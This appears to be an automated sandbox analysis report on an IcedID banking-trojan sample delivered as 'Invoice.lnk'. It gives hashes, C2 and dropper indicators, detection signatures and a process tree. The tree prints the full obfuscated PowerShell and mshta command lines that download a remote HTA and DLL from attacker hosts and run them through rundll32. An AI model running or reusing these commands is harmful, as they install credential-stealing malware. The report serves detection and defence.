Analysis

  • max time kernel
    44s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    06-07-2022 18:13

General

  • Target

    Invoice.lnk

  • Size

    178KB

  • MD5

    c29d6fc092698aafe01ece64da57254f

  • SHA1

    523e8303f8d6853ef499b742ef5e9d7485803a88

  • SHA256

    d94a96230551df45ea50a618f4ef47ab5f2cceaa612da2acdbd05a34b3e32cae

  • SHA512

    fa37a95c3eb1256bea25cc19f84de5de77f24a38938e062a08fab2073a8cc9ca480fa58fc90103f0e298958605866b1ec192971099dcaca4966bd134ac243e50

Malware Config

Extracted

  • Language

    hta

  • Source

    URLs

  • hta.dropper

    http://comradespoon.com/5h.hta

Extracted

  • Family

    icedid

  • Campaign

    1487191074

  • C2

    vneastruzz.com

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • suricata: ET MALWARE Win32/IcedID Request Cookie

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1748
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $OIdEhQrv = [convert]::FromBase64String('PjIv');$FByAlEjZ = [convert]::FromBase64String('GgQfAxZXHwMDB01YWBQYGgUWExIEBxgYGVkUGBpYQh9ZHwMW');$yZlUjspn = -join($OIdEhQrv | % {[char] ($_ -bxor 0x77)});$lMhAVEem = -join ($FByAlEjZ | % { [char] ($_ -bxor 0x77)});sal UFRBSlOH $yZlUjspn;UFRBSlOH $lMhAVEem
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1508
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" http://comradespoon.com/5h.hta
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1488
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lpasD($HADYWKdP, $JQNbwy){[IO.File]::WriteAllBytes($HADYWKdP, $JQNbwy)};function UrOfCPrL($HADYWKdP){if($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65487,65495,65495))) -eq $True){Start-Process (qQtFjAStmmZUquwlKa @(rundll32.exe $HADYWKdP ,PluginInit ))}elseif($HADYWKdP.EndsWith((qQtFjAStmmZUquwlKa @(65433,65499,65502,65436))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $HADYWKdP}else{Start-Process $HADYWKdP}};function iaeLEXNRYglRNM($lpasD){$ssPVUzIfuhNMPpFbC=(qQtFjAStmmZUquwlKa @(65459,65492,65487,65487,65488,65497));$uAbUQLrXxwt=(Get-ChildItem $lpasD -Force);$uAbUQLrXxwt.Attributes=$uAbUQLrXxwt.Attributes -bor ([IO.FileAttributes]$ssPVUzIfuhNMPpFbC).value__};function BRrXupXAZjXJXcLwJn($fRadwPdaCcH){$ZudUcOaTTWDij = New-Object (qQtFjAStmmZUquwlKa @(65465,65488,65503,65433,65474,65488,65485,65454,65495,65492,65488,65497,65503));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$JQNbwy = $ZudUcOaTTWDij.DownloadData($fRadwPdaCcH);return $JQNbwy};function qQtFjAStmmZUquwlKa($aiWdOwItl){$JGtzYUbtTnusApt=65387;$ouOlcqQbirCOt=$Null;foreach($ALFUNolW in $aiWdOwItl){$ouOlcqQbirCOt+=[char]($ALFUNolW-$JGtzYUbtTnusApt)};return $ouOlcqQbirCOt};function bdpFrZCPoqatcoUiW(){$QuseLIVGitH = $env:ProgramData + '\';$LbGea = $QuseLIVGitH + '1.dll'; if (Test-Path -Path $LbGea){UrOfCPrL $LbGea;}Else{ $oGMWxNZW = BRrXupXAZjXJXcLwJn (qQtFjAStmmZUquwlKa @(65491,65503,65503,65499,65445,65434,65434,65486,65498,65496,65501,65484,65487,65488,65502,65499,65498,65498,65497,65433,65486,65498,65496,65434,65436,65433,65487,65495,65495));lpasD $LbGea $oGMWxNZW;UrOfCPrL $LbGea;};iaeLEXNRYglRNM $LbGea;;;;;}bdpFrZCPoqatcoUiW;
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1336
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\ProgramData\1.dll PluginInit
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            PID:1012

Network

MITRE ATT&CK Enterprise v6


Downloads

  • C:\ProgramData\1.dll

    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

  • \ProgramData\1.dll

    Filesize

    813KB

    MD5

    35999cd6417ae33f264178adb800d560

    SHA1

    74276d57902e683fbcddb313cb34b0f92bcb52df

    SHA256

    1431a8c575238489245caf724cf7d6418ae4a7f72d76bb287fa54a9c1aadd710

    SHA512

    78ce4cf3f57ff3c39ed0af5998d1300805018511e788f3b9cf7505e01409fc3b7630555acda91e863c41a36043d1507e438089168286e920dfbef06382cc810d

  • memory/1012-106-0x0000000000000000-mapping.dmp

  • memory/1012-114-0x0000000180000000-0x0000000180009000-memory.dmp

    Filesize

    36KB

  • memory/1336-102-0x000007FEF3CC0000-0x000007FEF46E3000-memory.dmp

    Filesize

    10.1MB

  • memory/1336-100-0x0000000000000000-mapping.dmp

  • memory/1336-113-0x00000000025DB000-0x00000000025FA000-memory.dmp

    Filesize

    124KB

  • memory/1336-103-0x000007FEF3160000-0x000007FEF3CBD000-memory.dmp

    Filesize

    11.4MB

  • memory/1336-104-0x00000000025D4000-0x00000000025D7000-memory.dmp

    Filesize

    12KB

  • memory/1336-105-0x00000000025DB000-0x00000000025FA000-memory.dmp

    Filesize

    124KB

  • memory/1336-112-0x00000000025D4000-0x00000000025D7000-memory.dmp

    Filesize

    12KB

  • memory/1488-97-0x0000000000000000-mapping.dmp

  • memory/1508-98-0x0000000002744000-0x0000000002747000-memory.dmp

    Filesize

    12KB

  • memory/1508-96-0x000000001B760000-0x000000001BA5F000-memory.dmp

    Filesize

    3.0MB

  • memory/1508-94-0x000007FEF3B00000-0x000007FEF465D000-memory.dmp

    Filesize

    11.4MB

  • memory/1508-95-0x0000000002744000-0x0000000002747000-memory.dmp

    Filesize

    12KB

  • memory/1508-93-0x000007FEF4660000-0x000007FEF5083000-memory.dmp

    Filesize

    10.1MB

  • memory/1508-99-0x000000000274B000-0x000000000276A000-memory.dmp

    Filesize

    124KB

  • memory/1508-88-0x0000000000000000-mapping.dmp

  • memory/1748-54-0x000007FEFC021000-0x000007FEFC023000-memory.dmp

    Filesize

    8KB